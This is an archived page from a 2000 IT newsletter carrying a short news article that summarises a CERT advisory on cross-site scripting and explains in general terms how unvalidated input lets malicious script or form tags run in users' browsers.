Spacer Sidebar Directory Map

The Training Book, the handbook for trainers

Training Express computer learning guides

 

ITrain - International Association of Information Technology Trainers

New Security Headache

Hidden holes for hackers

ITINFO Sponsor

New Release: The Training Book, Volume 2

ITrain has limited pre-release copies of volume 2 of The Training Book, the handbook for trainers. Through an in-depth review of 67 articles, The Training Book demonstrates quickly and succinctly the steps you must take to become a great trainer.

Pre-release copies may be ordered today through the association's secure website, and quantities are limited.

Order your copy today!

Internet Poll
Have you attended a seminar via e-learning?
yes
no

poll archive

Cross-Site Scripting Security Bug Hits the Web

by Dave Murphy
ISSN 1535-3613

Dave Murphy, DGL President & ITrain founder A new security threat that puts all web users at significant risk has been describe in a security alert posted by the CERT Coordination Center, hosted by Carnegie-Mellon Software Engineering Institute and the Internet's most recognized security authority.

CERT described in it's alert how a website may inadvertently include malicious HTML tags or a script in a dynamically generated webpage that can be based on unvalidated input from untrustworthy sources.

This can be a problem when an Internet web server does not adequately ensure that generated pages are properly encoded to prevent unintended execution of scripts, and when input is not validated to prevent malicious HTML from being presented to the user.

Most web browsers have the capability to interpret scripts embedded in webpages. Such scripts may be written in a variety of scripting languages and are run by the client's browser. Most browsers are installed with the capability to run scripts enabled by default.

When a victim with scripts enabled in their browser reads this message, the malicious code may be executed unexpectedly. Scripting tags that can be embedded in this way include <SCRIPT>, <OBJECT>, <APPLET>, and <EMBED>.

In addition to scripting tags, other HTML tags such as the <FORM> tag have the potential to be abused by an attacker. For example, by embedding malicious <FORM> tags at the right place, an intruder can trick users into revealing sensitive information by modifying the behavior of an existing form. Other HTML tags can also be abused to alter the appearance of the page, insert unwanted or offensive images or sounds, or otherwise interfere with the intended appearance and behavior of the page.

This vulnerability is unusual because it's not limited to software from any one particular vendor. All web browsers on any type of operating system are at risk.

Call for Comments

What do you think? Leave your comments on the message center.

References

CERT Advisory
Microsoft Security Site
Apache CSS Info
Message Center

Subscribe to ITINFO.
Receive computing and Internet news & tips
by subscribing to the ITINFO information service.
Type your Internet email address in the form, and click "Subscribe."
Email Address:

Damar Group, Ltd. helps business use technology.

ITINFO is again accepting sponsors. Sponsor messages are included in ITINFO's email newsletter and are permanently posted to DGL's website and online reference areas.

ITINFO is an electronic publication of Damar Group, Ltd., publisher of Training Express computer learning guides. Comments and submissions to info@dgl.com.

Previous issues are on our website at http://dgl.com/itinfo/.

updated February 3, 2000
http://dgl.com/itinfo/2000/it000203.html

Return to DGL homepage
Copyright © 2000, Damar Group, Ltd., All Rights Reserved